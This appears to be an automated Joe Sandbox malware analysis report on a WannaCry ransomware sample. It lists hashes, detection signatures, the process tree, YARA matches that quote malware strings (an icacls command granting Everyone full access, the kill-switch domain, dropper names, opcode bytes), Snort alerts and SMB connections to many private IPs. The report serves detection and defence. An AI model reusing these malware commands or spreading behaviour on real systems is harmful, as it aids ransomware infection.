Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
e0R5qxY8Vj.exe

Overview

General Information

Sample Name:e0R5qxY8Vj.exe
Analysis ID:719534
MD5:b6aeab8b14c4279100d7f14b78dc4ec5
SHA1:887fc185484327153b63d5d356fe3a5eaebf105c
SHA256:26eebe4267523f0fd8e6ab6a857be45909cc88240e93549b6089921313dedf8e
Infos:

Detection

Wannacry
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Detected Wannacry Ransomware
Malicious sample detected (through community Yara rule)
Yara detected Wannacry ransomware
Antivirus / Scanner detection for submitted sample
Tries to download HTTP data from a sinkholed server
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Machine Learning detection for sample
Connects to many different private IPs (likely to spread or exploit)
Machine Learning detection for dropped file
Drops executables to the windows directory (C:\Windows) and starts them
Connects to many different private IPs via SMB (likely to spread or exploit)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Connects to several IPs in different countries
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • e0R5qxY8Vj.exe (PID: 5984 cmdline: C:\Users\user\Desktop\e0R5qxY8Vj.exe MD5: B6AEAB8B14C4279100D7F14B78DC4EC5)
    • tasksche.exe (PID: 1348 cmdline: C:\WINDOWS\tasksche.exe /i MD5: 753B5844028FBC529C56ADCE1F2FF2C1)
  • e0R5qxY8Vj.exe (PID: 3648 cmdline: C:\Users\user\Desktop\e0R5qxY8Vj.exe -m security MD5: B6AEAB8B14C4279100D7F14B78DC4EC5)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
e0R5qxY8Vj.exeWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
  • 0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0x3136c:$x3: tasksche.exe
  • 0x4157c:$x3: tasksche.exe
  • 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0x415d0:$x5: WNcry@2ol7
  • 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
  • 0xe048:$x7: mssecsvc.exe
  • 0x17350:$x7: mssecsvc.exe
  • 0x31344:$x8: C:\%s\qeriuwjhrf
  • 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0xe034:$s1: C:\%s\%s
  • 0x17338:$s1: C:\%s\%s
  • 0x31358:$s1: C:\%s\%s
  • 0x414d0:$s3: cmd.exe /c "%s"
  • 0x73a24:$s4: msg/m_portuguese.wnry
  • 0x2e68c:$s5: \\192.168.56.20\IPC$
  • 0x1ba81:$s6: \\172.16.99.5\IPC$
  • 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
  • 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
  • 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
  • 0x34aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
e0R5qxY8Vj.exeWannaCry_Ransomware_GenDetects WannaCry RansomwareFlorian Roth (based on rule by US CERT)
  • 0x1bacc:$s1: __TREEID__PLACEHOLDER__
  • 0x1bb68:$s1: __TREEID__PLACEHOLDER__
  • 0x1c3d4:$s1: __TREEID__PLACEHOLDER__
  • 0x1d439:$s1: __TREEID__PLACEHOLDER__
  • 0x1e4a0:$s1: __TREEID__PLACEHOLDER__
  • 0x1f508:$s1: __TREEID__PLACEHOLDER__
  • 0x20570:$s1: __TREEID__PLACEHOLDER__
  • 0x215d8:$s1: __TREEID__PLACEHOLDER__
  • 0x22640:$s1: __TREEID__PLACEHOLDER__
  • 0x236a8:$s1: __TREEID__PLACEHOLDER__
  • 0x24710:$s1: __TREEID__PLACEHOLDER__
  • 0x25778:$s1: __TREEID__PLACEHOLDER__
  • 0x267e0:$s1: __TREEID__PLACEHOLDER__
  • 0x27848:$s1: __TREEID__PLACEHOLDER__
  • 0x288b0:$s1: __TREEID__PLACEHOLDER__
  • 0x29918:$s1: __TREEID__PLACEHOLDER__
  • 0x2a980:$s1: __TREEID__PLACEHOLDER__
  • 0x2ab94:$s1: __TREEID__PLACEHOLDER__
  • 0x2abf4:$s1: __TREEID__PLACEHOLDER__
  • 0x2e2c4:$s1: __TREEID__PLACEHOLDER__
  • 0x2e340:$s1: __TREEID__PLACEHOLDER__
e0R5qxY8Vj.exeJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
    e0R5qxY8Vj.exewanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
    • 0x4157c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
    • 0x415a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
    e0R5qxY8Vj.exeWin32_Ransomware_WannaCryunknownReversingLabs
    • 0x340ba:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
    • 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ...
    • 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ...
    • 0x3985e:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Windows\tasksche.exeWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
    • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
    • 0xf4d8:$x3: tasksche.exe
    • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
    • 0xf52c:$x5: WNcry@2ol7
    • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
    • 0xf42c:$s3: cmd.exe /c "%s"
    • 0x41980:$s4: msg/m_portuguese.wnry
    • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
    • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
    • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
    C:\Windows\tasksche.exewanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
    • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
    • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
    C:\Windows\tasksche.exeWin32_Ransomware_WannaCryunknownReversingLabs
    • 0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
    • 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000000.311420520.000000000040E000.00000008.00000001.01000000.00000005.sdmpwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
    • 0x14d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
    • 0x1500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
    00000001.00000002.575670502.000000000042E000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
      00000000.00000000.304901922.000000000040F000.00000008.00000001.01000000.00000003.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
        00000000.00000002.316455024.000000000040F000.00000008.00000001.01000000.00000003.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
          00000001.00000002.577450819.0000000002528000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
            Click to see the 11 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.e0R5qxY8Vj.exe.1fe7084.3.raw.unpackWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
            • 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
            • 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
            • 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
            1.2.e0R5qxY8Vj.exe.254b96c.8.raw.unpackWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
            • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
            • 0xf4d8:$x3: tasksche.exe
            • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
            • 0xf52c:$x5: WNcry@2ol7
            • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
            • 0xf42c:$s3: cmd.exe /c "%s"
            • 0x41980:$s4: msg/m_portuguese.wnry
            • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
            • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
            • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
            1.2.e0R5qxY8Vj.exe.254b96c.8.raw.unpackwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
            • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
            • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
            1.2.e0R5qxY8Vj.exe.254b96c.8.raw.unpackWin32_Ransomware_WannaCryunknownReversingLabs
            • 0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
            • 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
            1.2.e0R5qxY8Vj.exe.2019128.4.raw.unpackWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
            • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
            • 0xf4d8:$x3: tasksche.exe
            • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
            • 0xf52c:$x5: WNcry@2ol7
            • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
            • 0xf42c:$s3: cmd.exe /c "%s"
            • 0x41980:$s4: msg/m_portuguese.wnry
            • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
            • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
            • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
            Click to see the 87 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:192.168.2.58.8.8.860841532024291 10/10/22-17:16:06.050133
            SID:2024291
            Source Port:60841
            Destination Port:53
            Protocol:UDP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.5104.17.244.8149699802024298 10/10/22-17:16:06.148980
            SID:2024298
            Source Port:49699
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.58.8.8.850295532024291 10/10/22-17:16:04.811422
            SID:2024291
            Source Port:50295
            Destination Port:53
            Protocol:UDP
            Classtype:A Network Trojan was detected
            Timestamp:104.16.173.80192.168.2.580496982031515 10/10/22-17:16:05.010911
            SID:2031515
            Source Port:80
            Destination Port:49698
            Protocol:TCP
            Classtype:Misc activity
            Timestamp:104.17.244.81192.168.2.580496992031515 10/10/22-17:16:06.200511
            SID:2031515
            Source Port:80
            Destination Port:49699
            Protocol:TCP
            Classtype:Misc activity
            Timestamp:192.168.2.5104.16.173.8049698802024298 10/10/22-17:16:04.949392
            SID:2024298
            Source Port:49698
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: e0R5qxY8Vj.exeReversingLabs: Detection: 100%
            Source: e0R5qxY8Vj.exeVirustotal: Detection: 84%Perma Link
            Antivirus / Scanner detection for submitted sample
            Source: e0R5qxY8Vj.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comURL Reputation: Label: malware
            Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/URL Reputation: Label: malware
            Antivirus detection for dropped file
            Source: C:\Windows\tasksche.exeAvira: detection malicious, Label: TR/Ransom.Gen
            Multi AV Scanner detection for dropped file
            Source: C:\Windows\tasksche.exeReversingLabs: Detection: 93%
            Machine Learning detection for sample
            Source: e0R5qxY8Vj.exeJoe Sandbox ML: detected
            Machine Learning detection for dropped file
            Source: C:\Windows\tasksche.exeJoe Sandbox ML: detected
            Source: 2.2.tasksche.exe.400000.0.unpackAvira: Label: TR/Ransom.Gen
            Source: 1.2.e0R5qxY8Vj.exe.7100a4.1.unpackAvira: Label: TR/Ransom.Gen
            Source: 0.2.e0R5qxY8Vj.exe.400000.0.unpackAvira: Label: TR/Ransom.Gen
            Source: 0.0.e0R5qxY8Vj.exe.400000.0.unpackAvira: Label: TR/Ransom.Gen
            Source: 1.0.e0R5qxY8Vj.exe.7100a4.1.unpackAvira: Label: TR/Ransom.Gen
            Source: 1.2.e0R5qxY8Vj.exe.25198c8.7.unpackAvira: Label: TR/Ransom.Gen
            Source: 1.2.e0R5qxY8Vj.exe.400000.0.unpackAvira: Label: TR/Ransom.Gen
            Source: 1.2.e0R5qxY8Vj.exe.254b96c.8.unpackAvira: Label: TR/Ransom.Gen
            Source: 1.2.e0R5qxY8Vj.exe.2019128.4.unpackAvira: Label: TR/Ransom.Gen
            Source: 0.0.e0R5qxY8Vj.exe.7100a4.1.unpackAvira: Label: TR/Ransom.Gen
            Source: 2.0.tasksche.exe.400000.0.unpackAvira: Label: TR/Ransom.Gen
            Source: 1.0.e0R5qxY8Vj.exe.400000.0.unpackAvira: Label: TR/Ransom.Gen
            Source: 0.2.e0R5qxY8Vj.exe.7100a4.1.unpackAvira: Label: TR/Ransom.Gen
            Source: 1.2.e0R5qxY8Vj.exe.1fe7084.3.unpackAvira: Label: TR/Ransom.Gen
            Source: C:\Windows\tasksche.exeCode function: 2_2_004018B9 CryptReleaseContext,2_2_004018B9

            Exploits

            barindex
            Connects to many different private IPs (likely to spread or exploit)
            Source: global trafficTCP traffic: 192.168.2.39:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.38:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.42:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.41:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.44:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.43:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.46:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.45:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.48:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.47:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.40:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.28:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.27:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.29:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.31:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.30:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.33:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.32:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.35:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.34:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.37:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.36:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.17:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.16:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.19:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.18:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.20:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.22:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.21:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.24:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.23:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.26:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.25:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.97:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.96:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.11:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.99:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.10:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.98:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.13:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.12:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.15:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.14:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.91:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.90:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.93:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.92:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.95:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.94:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.2:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.1:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.8:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.7:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.9:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.4:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.3:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.6:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.5:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.86:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.104:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.85:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.105:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.88:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.102:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.87:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.103:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.108:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.89:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.109:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.106:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.107:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.80:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.82:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.100:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.81:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.101:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.84:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.83:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.75:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.115:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.74:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.116:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.77:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.113:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.76:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.114:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.79:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.119:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.78:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.117:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.118:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.71:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.111:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.70:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.112:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.73:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.72:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.110:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.64:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.63:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.66:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.65:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.68:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.67:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.69:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.60:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.62:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.61:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.49:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.53:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.52:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.55:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.54:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.57:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.56:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.59:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.58:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.51:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.50:445Jump to behavior
            Connects to many different private IPs via SMB (likely to spread or exploit)
            Source: global trafficTCP traffic: 192.168.2.39:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.38:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.42:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.41:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.44:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.43:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.46:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.45:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.48:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.47:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.40:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.28:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.27:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.29:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.31:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.30:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.33:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.32:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.35:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.34:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.37:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.36:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.17:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.16:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.19:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.18:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.20:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.22:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.21:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.24:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.23:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.26:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.25:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.97:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.96:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.11:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.99:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.10:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.98:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.13:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.12:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.15:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.14:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.91:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.90:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.93:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.92:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.95:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.94:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.2:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.1:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.8:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.7:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.9:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.4:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.3:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.6:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.5:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.86:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.104:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.85:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.105:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.88:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.102:445Jump to behavior
